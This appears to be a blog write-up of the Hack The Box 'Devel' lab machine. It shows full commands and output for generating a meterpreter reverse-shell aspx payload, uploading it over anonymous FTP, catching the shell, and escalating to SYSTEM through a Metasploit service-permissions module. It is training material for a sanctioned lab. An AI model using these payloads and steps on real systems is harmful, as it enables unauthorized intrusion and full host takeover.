Home Hack The Box - Devel
Post
Cancel

Hack The Box - Devel

By h3xit
Posted Jan 18 Updated Jan 30 3 min read

Challenge description

https://app.hackthebox.com/machines/Devel

This VM is an easy Windows machine

Reconnaissance / Enumeration

Port scanning and service identification

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

$ rustscan -a $ip -r 1-65535 --ulimit 5000 -- -A -sC -Pn
[...]
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We have an IIS 7.5 FTP and Web server

Web Enumeration

There’s not much here to discover. The site is an IIS default web page.

FTP Enumeration

FTP server is accessible anonymously. Even better, this FTP server is giving us write permissions on the site root folder.

Exploitation && Foothold

Let’s create a meterpreter payload as an aspx file and upload it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f aspx > h3xshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2713 bytes

$ ftp $ip
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:h3x): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put h3xshell.aspx
local: h3xshell.aspx remote: h3xshell.aspx
229 Entering Extended Passive Mode (|||49211|)
150 Opening ASCII mode data connection.
100% |****************************************************************************************************************|  2748       23.60 MiB/s    --:-- ETA
226 Transfer complete.
2748 bytes sent in 00:00 (143.79 KiB/s)

Now that our payload is in place, launch a metasploit handler, browse the payload and wait for the shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

$ msfconsole

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set rhosts 10.10.10.5
rhosts => 10.10.10.5
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Sending stage (175174 bytes) to 10.10.10.5
Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.5:49277 ) at 2022-01-19 04:11:20 +0000

meterpreter > shell
Process 516 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

Privilege Escalation

There are 2 services vulnerable to a registry edit attack. Dnscache and RpcEptMapper. There is a way to create a performance counter pointing to a malicious DLL.

The exploit is well described here

There’s a metasploit module that we can use to exploit the service: exploit/windows/local/service_permissions

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/service_permissions
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) > set session 1
session => 1
msf6 exploit(windows/local/service_permissions) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/service_permissions) > run

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Trying to add a new service...
[*] Trying to find weak permissions in existing services..
[+] [Dnscache] Created registry key: HKLM\System\CurrentControlSet\Services\Dnscache\Performance
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 4 opened (10.10.14.5:4444 -> 10.10.10.5:49271 ) at 2022-01-19 02:02:05 +0000

meterpreter > shell
Process 728 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
e69af0e4f443de7e36876fda4ec7644f
C:\Windows\system32>whoami
whoami
nt authority\system

c:\Users\babis\Desktop>more user.txt.txt
more user.txt.txt
(redacted)

C:\Windows\system32>more e69af0e4f443de7e36876fda4ec7644fc:\users\administrator\desktop\root.txt
more c:\users\administrator\desktop\root.txt
(redacted)

Thanks for reading <3

h3x

hackthebox
windows
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents